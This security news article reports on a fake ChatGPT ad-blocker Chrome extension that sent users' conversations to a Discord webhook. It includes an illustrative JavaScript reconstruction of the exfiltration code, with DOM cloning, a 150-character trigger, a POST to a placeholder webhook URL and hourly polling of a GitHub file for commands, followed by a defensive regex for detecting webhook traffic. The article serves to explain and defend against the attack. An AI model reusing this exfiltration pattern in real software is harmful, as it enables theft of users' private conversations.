
Fake ChatGPT Ad Blocker Chrome Extension Caught Spying on Users
Why It Matters
The scheme exposes sensitive business and personal prompts to cyber‑criminals, undermining trust in AI tools and highlighting the risks of unofficial browser add‑ons. It signals a new attack vector that could compromise confidential information across the rapidly expanding generative‑AI market.
Key Takeaways
- Fake “ChatGPT Ad Blocker” extension harvested user conversations.
- Extension cloned the DOM and sent texts over 150 characters to Discord.
- Developer krittinkalra is linked to other AI apps, raising suspicion.
- Extension checked GitHub hourly for remote command updates.
- Users should rely on official settings; third‑party blockers are risky.
Pulse Analysis
The emergence of a fake "ChatGPT Ad Blocker" extension underscores a growing trend: threat actors exploiting the hype around generative AI to distribute malware. OpenAI's recent decision to introduce ads for free‑tier users created fertile ground for scammers promising an ad‑free experience. By masquerading as a productivity tool on the official Chrome Web Store, the extension lured unsuspecting users into installing it, demonstrating how quickly malicious actors can capitalize on policy shifts to gain credibility and scale.
Technically, the extension performed a DOM‑cloning operation that stripped away visual elements, leaving only raw text. Any conversation exceeding 150 characters triggered an exfiltration routine that posted the data to a Discord webhook managed by a bot named Captain Hook. The malicious code also queried a GitHub file every hour, enabling the operators to push new commands or payloads without updating the extension itself. This modular approach not only evades static detection but also allows rapid adaptation to security countermeasures, posing a sophisticated threat to both individual users and enterprises that rely on ChatGPT for confidential workflows.
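Based on the reported behavior, the core logic likely resembles the sketch below. Every identifier, the webhook URL, and the GitHub file location are illustrative assumptions; only the behavior itself (DOM cloning, the 150‑character threshold, hourly polling) comes from the report.

```javascript
// Illustrative reconstruction of the reported exfiltration pattern.
// All names and URLs are hypothetical placeholders.

const CHAR_THRESHOLD = 150; // reported trigger length

// Clone the conversation container and strip it to raw text,
// as the extension reportedly did before exfiltration.
function extractConversationText(container) {
  const clone = container.cloneNode(true); // deep copy of the DOM subtree
  clone.querySelectorAll("script, style, img, svg").forEach((el) => el.remove());
  return clone.textContent.trim();
}

// Only conversations longer than the threshold trigger the routine.
function shouldExfiltrate(text) {
  return text.length > CHAR_THRESHOLD;
}

// POST captured text to an attacker-controlled Discord webhook
// (placeholder URL; the real endpoint was not published).
function sendToWebhook(text) {
  return fetch("https://discord.com/api/webhooks/<redacted>", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ content: text }),
  });
}

// Hourly check of a GitHub-hosted file for new operator commands,
// letting operators change behavior without shipping an update.
function pollForCommands(rawFileUrl, handleCommand) {
  setInterval(async () => {
    const res = await fetch(rawFileUrl);
    if (res.ok) handleCommand(await res.text());
  }, 60 * 60 * 1000); // every hour, per the report
}
```

The polling step is what makes the design modular: the installed extension stays static (and passes store review), while the real instructions live in a file the operators can rewrite at will.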
For organizations and professionals, the incident is a stark reminder to verify the provenance of browser extensions and to prefer native settings over third‑party solutions. Security teams should monitor outbound traffic for unusual Discord webhook calls and enforce strict extension whitelisting policies. The broader AI ecosystem must also prioritize transparency and user education to mitigate the allure of unofficial tools that promise shortcuts but deliver data theft. Vigilance, combined with robust endpoint protection, will be essential as malicious actors continue to weaponize the AI boom.
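For defenders, the Discord‑webhook indicator is straightforward to screen for. A minimal sketch of such a check follows; the log‑line format and function name are assumptions, so the parsing would need adapting to your own egress telemetry:

```javascript
// Minimal detector for outbound Discord webhook calls in proxy/egress logs.
// Webhook URLs follow the pattern discord.com/api/webhooks/<id>/<token>.

const DISCORD_WEBHOOK_RE =
  /https?:\/\/(?:\w+\.)?discord(?:app)?\.com\/api\/webhooks\/\d+\/[\w-]+/i;

// Return only the log lines that contain a Discord webhook URL.
function flagWebhookCalls(logLines) {
  return logLines.filter((line) => DISCORD_WEBHOOK_RE.test(line));
}
```

Legitimate use of Discord webhooks exists (chat-ops notifications, for example), so flagged lines are a starting point for triage rather than proof of compromise.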